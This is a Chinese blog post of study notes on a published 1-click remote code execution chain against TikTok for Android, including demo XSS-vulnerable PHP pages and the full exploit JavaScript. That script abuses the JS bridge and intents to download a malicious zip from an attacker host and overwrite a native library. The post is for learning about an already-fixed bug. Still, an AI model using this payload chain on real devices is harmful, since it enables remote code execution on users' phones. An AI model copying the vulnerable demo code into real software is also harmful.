国外大神 TikTok for Android 1-Click RCE 过程学习记录

最新推荐文章于 2024-04-19 19:07:39 发布
最新推荐文章于 2024-04-19 19:07:39 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 安全 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qhaaha/article/details/115693095
版权

TikTok for Android 1-Click RCE 原文地址:传送门
作者Sayed Abdelhafiz, 需要科学。

主要阅读 + 理解其漏洞探寻和利用的过程。Let’s begin!

1

这一部分主要提到了tiktok上的一个XSS, 什么是XSS?

XSS

cross-site script 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

仿照别人写了两段不加防范的网页,容易被XSS攻击。

<html>
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>XSS</title> 
</head> 
<body> 
<form action="" method="get"> 
<input type="text" name="input">     
<input type="submit"> 
</form> 
<br> 
<?php 
$XssReflex = $_GET['input'];
echo 'output:<br>'.$XssReflex;
?> 
</body> 
</html>

效果是这样,用一些小小的技巧,就能将一段自己的script注入。

在这里插入图片描述

然后这个网页

<span style="font-size:18px;"><meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>  
<html>  
<head>  
<title>XssStorage</title>  
</head>  
<body>  
<h2>Message Board<h2>  
<br>
<form action="2.php" method="post">  
Message:<textarea id='Mid' name="desc"></textarea>  
<br>  
<br>  
Subuser:<input type="text" name="user"/><br> 
<br>
<input type="submit" value="submit" onclick='loction="2.php"'/>  
</form>  
<?php  
if(isset($_POST['user'])&&isset($_POST['desc'])){  
$log=fopen("sql.txt","a");  
fwrite($log,$_POST['user']."\r\n");  
fwrite($log,$_POST['desc']."\r\n");  
fclose($log);  
}  
    
if(file_exists("sql.txt"))  
{  
$read= fopen("sql.txt",'r');  
while(!feof($read))  
{  
    echo fgets($read)."</br>";  
}  
fclose($read);  
}  
?>  
</body>  
</html></span>

这次会将获得的输入保存在模拟的数据库中,下次打开网页会从数据库中获取数据。这样,通过精心设计的输入,可以让破坏被注入数据库,下次打开网页效果还会保持:
在这里插入图片描述
在这里插入图片描述
最终的html中也被注入了alert语句
在这里插入图片描述

2

作者注意到,为了计算性能等原因,tiktok在加载页面后会通过android webview中的

public void evaluateJavascript(String script,
                               android.webkit.ValueCallback<String> resultCallback)

这个函数执行下面这段js代码:

JSON.stringify(window.performance.getEntriesByName('this.webviewURL') )

引号中的this.webviewURL 为从网页获取的一段字符串

qs: 这个webviewURL是从哪里输入获得的?

作者最终用 https://m.tiktok.com/falcon/#’),alert(1));// 作为this.webviewURL,则被执行的语句替换为了:

JSON.stringify(
    window.performance.getEntriesByName('https://m.tiktok.com/falcon/#'),
    alert(1)
);//') )

这样就能执行alert函数了。

这是一个Universal XSS, 类似m.tiktok.com/falcon/ 的链接都会触发类似的逻辑。

3

I have enabled WebViewDebug module to debug the WebView from my dev-tools in google chrome.

qs: 这一步不知道是什么操作?

webview支持intent,作者尝试用这种方式将控制转移到外部逻辑。但是遇到了2-click exploits问题。

4

之后他通过一些手段绕过了AddWikiActivity 的url validation ,主要想法是看到这样的验证代码:

if(!e.b(arg8)) {
    com.bytedance.t.c.e.b.a("AbsSecStrategy", "needBuildSecLink : url is invalid.");
    return false;
}
public static boolean b(String arg1) {
    return !TextUtils.isEmpty(arg1) && ((arg1.startsWith("http")) || (arg1.startsWith("https"))) && !e.a(arg1);
}

tiktop的代码逻辑认为,如果不是http或者https的scheme,就不需要做验证了,因为肯定是无效的!所以可以在这里找机会注入我们的代码。

window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
    "__callback_id": "0",
    "func": "openSchema",
    "__msg_type": "callback",
    "params": {
        "schema": "aweme://wiki?url=javascript://m.tiktok.com/%250adocument.write(%22%3Ch1%3E PoC %3C%2Fh1%3E%22)&disable_app_link=false"
    },
    "JSSDK": "1",
    "namespace": "host",
    "__iframe_url": "http://iframe.attacker.com/"
}));

qs: 这个函数在干什么?那一长串是什么格式? 我找到里面document.write(…PoC…) 这部分了,但是是怎么断句,把控制权转移出来的?

5

这一步是想要通过下面的语句调用 UserFavoritesActivity

location.replace("intent:#Intent;        			 component=com.zhiliaoapp.musically/com.ss.android.ugc.aweme.favorites.ui.UserFavoritesActivity;	package=com.zhiliaoapp.musically;										action=android.intent.action.VIEW;end;"
)

为了方便我把字符串分开了。

location.replace方法以给定的URL来替换当前的资源。

具体的语义还未深入了解,初步观察应该这个url就是通过intent调用 UserFavoritesActivity吧。

6

现在漏洞和注入的方式找到了,作者开始尝试通过将控制转移到一个下载/更新/安装的process TmaTestActivity,作者希望通过以特定的参数调用这个intent,最终达到用自己的文件覆盖库文件的目的

来看看过程,作者是结合自己逆向出的代码反推整体的逻辑。

private final void updateJssdk(Context arg5, Uri arg6, TmaTestCallback arg7) {
    String v0 = arg6.getQueryParameter("sdkUpdateVersion");
    String v1 = arg6.getQueryParameter("sdkVersion");
    String v6 = arg6.getQueryParameter("latestSDKUrl");
    SharedPreferences.Editor v2 = BaseBundleDAO.getJsSdkSP(arg5).edit();
    v2.putString("sdk_update_version", v0).apply();
    v2.putString("sdk_version", v1).apply();
    v2.putString("latest_sdk_url", v6).apply();
    // !!!
    DownloadBaseBundleHandler v6_1 = new DownloadBaseBundleHandler();
    // 
    BundleHandlerParam v0_1 = new BundleHandlerParam();
    v6_1.setInitialParam(arg5, v0_1);
    // !!!
    ResolveDownloadHandler v5 = new ResolveDownloadHandler();
    // 
    v6_1.setNextHandler(((BaseBundleHandler)v5));
    // !!!
    SetCurrentProcessBundleVersionHandler v6_2 = new SetCurrentProcessBundleVersionHandler();
    // 
    v5.setNextHandler(((BaseBundleHandler)v6_2));
}

整体步骤有3个函数,我在上面用!!!标出来了。

public BundleHandlerParam handle(Context arg14, BundleHandlerParam arg15) {
        // .....
      String v0 = BaseBundleManager.getInst().getSdkCurrentVersionStr(arg14);
      String v8 = BaseBundleDAO.getJsSdkSP(arg14).getString("sdk_update_version", "");
    //   .....
      if(AppbrandUtil.convertVersionStrToCode(v0) >= AppbrandUtil.convertVersionStrToCode(v8) && (BaseBundleManager.getInst().isRealBaseBundleReadyNow())) {
          InnerEventHelper.mpLibResult("mp_lib_validation_result", v0, v8, "no_update", "", -1L);
          v10.appendLog("no need update remote basebundle version");
          arg15.isIgnoreTask = true;
          return arg15;
      }
    //   .....
      this.startDownload(v9, v10, arg15, v0, v8);
    //   .....

先看第一个函数,用来检查要安装的版本(通过sdkUpdateVersion这个参数获得)是否新于现有的版本,如果是才会更新。所以作者将这个参数设置为99.99.99。

顺着逻辑继续,是这样一段代码(作者说在startDownload 这个方法里)

// in startDownload Method
    v2.a = StorageUtil.getExternalCacheDir(AppbrandContext.getInst().getApplicationContext()).getPath();
    v2.b = this.getMd5FromUrl(arg16);

  • v2.a 是下载路径,这里有一个问题是AppbrandContext需要实例化,作者花费了一些时间找到了他实例化的地方:

    preloadMiniApp通过调用功能ToutiaoJSBridge可以为我初始化实例!”, 稍后看看他怎么调用了这个功能。

  • v2.b是下载文件的md5sum值。这是什么?我大概查了一下:通过MD5值,来判断自己down的文件与服务器上的文件是否一致。也可以比较两个文件是否相同。不管了,暂时当作是一个校验和吧。

    这个值通过参数中的文件名直接获得:

    private String getMd5FromUrl(String arg3) {
    return arg3.substring(arg3.lastIndexOf("_") + 1, arg3.lastIndexOf("."));
}

    命名方式需要按照:anything_{md5sum_of_file}.zip

然后就是解压和安装,代码有点长不粘贴在这里,放在his.java中了。就把他提到的一个小的注意点粘过来:

 if((arg7) && !TextUtils.isEmpty(v1) && (v1.contains("../"))) { // Are you notice arg7?
           goto label_2;
 }

这里需要设置arg7 = 0 跳过检查。

搞清楚逻辑后,最后注入的代码就是:

location.replace(
    "intent:#Intent; component=com.zhiliaoapp.musically/com.ss.android.ugc.aweme.favorites.ui.UserFavoritesActivity;  package=com.zhiliaoapp.musically;  action=android.intent.action.VIEW; end;")

document.title = "Loading..";
document.write("<h1>Loading..</h1>");
if (document && window.name != "finished") { // the XSS will be fired multiple time before loading the page and after. this condition to make sure that the payload won't fire multiple time.
    window.name = "finished";
    window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
        "__callback_id": "0",
        "func": "preloadMiniApp",
        "__msg_type": "callback",
        "params": {
            "mini_app_url": "https://microapp/"
        },
        "JSSDK": "1",
        "namespace": "host",
        "__iframe_url": "http://d.c/"
    })); // initialize Mini App
    window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
        "__callback_id": "0",
        "func": "openSchema",
        "__msg_type": "callback",
        "params": {
            
      //      
            "schema": "aweme://wiki?url=javascript:location.replace(
     	%22                                       	  	 intent%3A%2F%2Fwww.google.com.eg%2F%3Faction%3DsdkUpdate%26latestSDKUrl%3Dhttp%3A%2F%2F{ATTACKER_HOST}
        %2Flibran_a1ef01b09a3d9400b77144bbf9ad59b1.zip
        %26sdkUpdateVersion%3D1.87.1.11%23
        Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically
        
        %2Fcom.tt.miniapp.tmatest.TmaTestActivity
        %3Bpackage%3Dcom.zhiliaoapp.musically%
        3Baction
        %3Dandroid.intent.action.VIEW%3Bend%22)
        %3B%0A&noRedirect=false&title=First%20Stage&disable_app_link=false"
        },
     ///   
        
        "JSSDK": "1",
        "namespace": "host",
        "__iframe_url": "http://iframe.attacker.com/"
    })); // Download malicious zip file that will overwite /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so
    setTimeout(function() {
        window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
            "__callback_id": "0",
            "func": "openSchema",
            "__msg_type": "callback",
            "params": {
                
                //
                "schema": "aweme://wiki?url=javascript:location.replace(
                %22intent%3A%23Intent%3Bscheme%3Dhttps%3Bcomponent
                %3Dcom.zhiliaoapp.musically
                
                %2Fcom.tt.miniapphost.placeholder.MiniappTabActivity0
                %3Bpackage%3Dcom.zhiliaoapp.musically
                %3BS.miniapp_url%3Dhttps%3Bend%22)
            %3B%0A&noRedirect=false&title=Second%20Stage&disable_app_link=false"
            },
            /                                               
                                                           
            "JSSDK": "1",
            "namespace": "host",
            "__iframe_url": "http://iframe.attacker.com/"
        })); // load the malicious library after overwrtting it.
    }, 5000);
}

注入的核心是两个很长的字符串,调用了前面说的location.replace来转移控制。我在代码中将很长的字符串分解开来了,并前后用注释符标注,方便观看。

前面这个主要是执行一开始的目标,TmaTestActivity。

后面这个的作用是:上述流程一般只有在重启app的时候才会发生,通过调用MiniappTabActivity0可以替代重启。

然后攻击就成功了。不久后tiktok修复了这个漏洞。

劳塔罗爆射破门
关注
专栏目录
在三星Android手机上从Fuzzing漏洞挖掘到RCE漏洞利用
systemino的博客
05-21 1149
我们进行了一些在三星Android手机上的安全性研究,这些研究证明了通过发送无用户交互的mms,可以从Fuzzing模糊测试到实现远程代码执行利用。 Google的Project Zero致力于挖掘0-day漏洞并破解各种产品,他们已经在三星的Android Skia图像处理库中发现一些堆溢出问题。 此漏洞由团队成员Mateusz Jurczyk发现的。此漏洞使恶意MMS能够触发远程代码执行,该漏洞是在图像处理中发生的,图像处理是在收到短信并且由Android的Skia库处理图像而没有用户交互时发生的。
typecho 1.2.0 1click rce
小火炬的博客
04-15 452
typecho 1.2.0 1click rce
1-click-crx插件
04-03
语言:English 一键访问机构登录页面以获取全文 您的工作是否需要您在线查找学术期刊? 如果是这样,在登录访问付费壁垒资源的繁琐过程中的挫败感可能太熟悉了。 一键式显示位于浏览器工具栏中,可轻松访问文章的完整版本。 请注意,您需要已经可以对所涉及的期刊进行机构访问-1-Click不会提供对付费内容的未经授权的访问。 说明:1. [仅在安装时需要]单击工具栏图标,然后从下拉列表中选择您的机构。 点击“保存”。 2.像往常一样搜索文章。 当出现不完整的文章并要求登录以进行访问时,请注意“ 1-Click”按钮。 3.当出现您的机构登录页面时,请填写您的凭据并继续。 和presto! 您将被带到整篇文章。 它的工作原理是为文章URL加上机构代理URL的前缀,并且如果您的机构对内容有有效的订阅,则登录后即可进入完整版本。需要最小的设置,并且您可以在任何位置更改机构代理通过单击工具栏图标来确定时间。 该扩展会记住您最近保存的代理,并在每次启动浏览器时在后台运行! 如果您希望在校外进行研究时保持简洁,无压力的体验,则一键式是您的理想选择。 有时,不需要云存储和标记工具-也许像我一样,您已经在使
抖音TikTok快手微信小红书通过intent意图跳转集合详情 URL Scheme 云控auto.js实现intent跳转示例startActivity地址
qq_23857415的博客
12-04 5731
实现意图intent跳转示例 Scheme地址大全 startActivity
【GitHub精选项目】抖音/ TikTok 视频下载:TikTokDownloader 操作指南
苟日新,日日新,又日新!!!
12-25 7999
这个工具非常适合内容创作者和普通用户使用,因为它使他们能够轻松地保存重要的或有趣的内容,无论是用于个人回顾、好友分享、内容创作还是学术研究。总之,项目旨在为 TikTok 用户提供便捷的视频下载解决方案,帮助他们管理和享受 TikTok 上的优质内容。这个工具为用户提供了更多选择,以便更好地利用 TikTok 平台上的视频资源。
【技术分享】赏金$10000+的TikTok Android 1-Click RCE漏洞 .pdf
09-05
【技术分享】赏金$10000+的TikTok Android 1-Click RCE漏洞 企业安全 威胁情报 数据安全 系统安全 安全人才
TikTok-31.5.3-All-Multi-Dmitry.apk
10-09
TikTok-31.5.3-All-Multi-Dmitry.apk
tiktok-live:下载实时tiktok
05-27
tiktok-live 安装 首先,您需要安装下载并安装LTS或Current。 然后启动您的终端(在Windows上为cmd.exe),并使用NPM安装tiktok-live: npm install -g tiktok-live tiktok-live命令将在您的控制台中可用(cmd....
TikTok-API-PHP:用于 PHP 的非官方 TikTok API。 加入我们的 Discord 服务器
08-03
composer require ssovit/tiktok-api 正在寻找无水印视频 API? 它可以按月订阅。 请参阅下面的计划和联系方式。 用法 遵循/example目录中的/example $ api = new \ Sovit \ TikTok \ Api ( array ( /* config ...
Tiktok Viewer Online-crx插件
04-06
tiktok在线查看器&tiktok浏览器 - 在没有帐户的情况下观看在PC上的Tiktok视频。 在PC上观看Tiktok视频,就像在手机上一样。 随意更改要模拟,手机或垫或全屏的设备类型。 1.输入Tiktok用户名,然后单击“遵循”以...
通过超链接url打开一些常见app(scheme)
07-16
通过超链接url打开一些常见app(scheme)
TikTok
03-04
“#你好,世界”
条款与条件
xuchuandong520的专栏
07-02 2716
条款与条件 A. MAC APP STORE、APP STORE和IBOOKS B. MAC APP STORE、APP STORE和IBOOKS STORE条款和条件 您在使用MAC APP STORE、APP STORE和IBOOKS STORE(“有关商店”)时受到下文所载的您与ITUNES SARL (“ITUNES")之间的法律协议的管辖。如您同意这些条款,请点击“同意”。
Tiktok的scheme协议汇总,有Python adb示例
qq_30417863的博客
09-12 1378
Tiktok汇总协议 scheme
抖音TikTok-Scheme汇总
cqt_huahua的博客
12-24 4082
Scheme汇总:包含抖音,快手等
JsBridge使用和原理
jiang19921002的博客
06-25 1438
近期在做一个项目,使用的是Native+H5的方式实现的。众所周知的是在Android中,Webview所实现的java与js的交互存在一些安全问题,并且这样的使用方式,没法让一套H5同时适配Android和iOS两个平台,因此,就需要有一个中间组件来实现js与本地的代码的交互,也就是JsBridge。在Android平台我们选用了开源项目。整个库的结构也比较简单:一个用来注入的js文件,一个自定...
绕过Tiktok强制登录
碎片的博客
02-08 1868
Tiktok检测到设备异常会强制用户登录,如何绕过呢?
TikTok外贸脚本必备功能!
2301_79655572的博客
04-19 1157
本文介绍了TikTok外贸脚本中的一键采集、去水印、发布视频、私信好友以及拟人养号等必备功能,并对这些功能的源代码进行了科普。
开发tiktok自动化脚本必不可少的五段源代码!
2301_79655572的博客
04-11 1443
开发一套针对TikTok的自动化脚本显得尤为重要,本文将分享开发TikTok自动化脚本过程中必不可少的五段源代码,并详细解释每段代码的作用和实现原理。
tiktok X-Tt-Trace-Id nodejs ile nasıl üretebilirim
最新发布
10-19
TikTok'da kullanılan X-Tt-Trace-Id, mesajların izlenmesi ve tracing için bir tanımlayıcıdır, özellikle microservices dünyasında popüler olan.trace ID'si genellikle bir otomatik oluşturucu veya tracer库 aracılığıyla Node.js uygulamalarında üretilebilir. Bu tanımlayıcılar, her işlemün başlangıcından sonuna kadar doğru şekilde takip edilmesini sağlar. Node.js'de X-Tt-Trace-Id'i oluşturma işlemi genellikle next.js, winston-trace, otomatik olarak tanımlanan Express trace middleware'leri gibi araçlarla gerçekleştirilebilir. Örneğin: 1. Winston-trace modülü kullanarak: ```javascript const { Trace } = require('winston-trace'); app.use(Trace({ serviceName: 'your-service-name' })); ``` Her isteğin başlangıcında yeni bir trace ID oluşturulur ve HTTP etiketlerinde aktarılır. 2. Express-trace-id gibi middleware'ları kullanmak: ```javascript const expressTracer = require('express-trace-id'); app.use(expressTracer()); ``` Middleware, her isteğin request headers'ına X-Tt-Trace-Id ekler.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值